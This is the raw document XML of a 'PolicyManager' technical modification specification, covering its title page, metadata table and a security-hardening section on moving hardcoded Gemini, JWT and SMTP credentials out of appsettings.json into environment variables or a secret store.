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80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">PolicyManager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="475569"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Modification Specification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="818CF8" w:sz="8" w:space="1"/>
          <w:bottom w:val="single" w:color="818CF8" w:sz="8" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="60" w:before="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="3730A3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   Full-Stack Implementation Guide — v3.0   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="94A3B8"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ASP.NET Core 8  ·  Angular 17  ·  SQL Server  ·  Google Gemini AI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="6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7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF2FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3730A3"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Document Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Technical Modification Specification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF2FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3730A3"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F8F7FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF2FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3730A3"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Prepared By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Engineering Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF2FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3730A3"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Source Document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F8F7FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Enhancement Review v2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF2FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3730A3"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">17 May 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF2FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3730A3"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Sprint Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:left w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:bottom w:val="single" w:color="C7D2FE" w:sz="4"/>
              <w:right w:val="single" w:color="C7D2FE" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F8F7FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Sprint 1 – Sprint 8 (16 Weeks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>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bookmarkStart w:name="sec1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 1 — Security Hardening</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All security modifications are classified as Critical Priority and must be completed in Sprint 1 (Weeks 1–2) before any other development begins. These changes address vulnerabilities found in the existing codebase that could expose production data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec1-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1  Secret Management — Remove Hardcoded Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Gemini API key, JWT signing key, and SMTP credentials are stored directly in appsettings.json and referenced inline in Services.cs. Any developer with repository access can read these values. If the repository is public or leaked, credentials are immediately compromised.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="E11D48" w:sz="16"/>
        </w:pBdr>
        <w:shd w:fill="FFF1F2" w:val="clear"/>
        <w:spacing w:after="100" w:before="100"/>
        <w:ind w:left="360" w:right="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk Level: CRITICAL — Credential leakage can result in unauthorized API usage, financial loss from API billing abuse, and complete authentication bypass.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Files to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3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3080"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Current Problem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3080"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Required Action</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appsettings.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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GeminiApi:ApiKey stored in plain text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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Remove value — keep key name with empty string placeholder only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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appsettings.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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JwtSettings:SecretKey hard-coded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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Remove value — key must be 256-bit minimum</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appsettings.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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EmailSettings:SmtpPassword plain text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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Remove — use environment variable or User Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Services.cs → AuthService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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Reads JwtSettings directly from IConfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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No change — config path is fine; only the value source changes</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Program.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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No secret provider registered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="308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Add User Secrets in Development; Azure Key Vault in Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementation — appsettings.json (After)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  "GeminiApi": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "ApiKey": "",         // DO NOT put real key here — use env var: GeminiApi__ApiKey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "Model": "gemini-1.5-flash",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "Endpoint": "https://generativelanguage.googleapis.com/v1/models"</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"JwtSettings": {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SecretKey": "",      // DO NOT put real key here — use env var: JwtSettings__SecretKey</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    "Issuer": "PolicyManagerAPI",</w:t>
      </w:r>
    </w:p>
    <w:p>
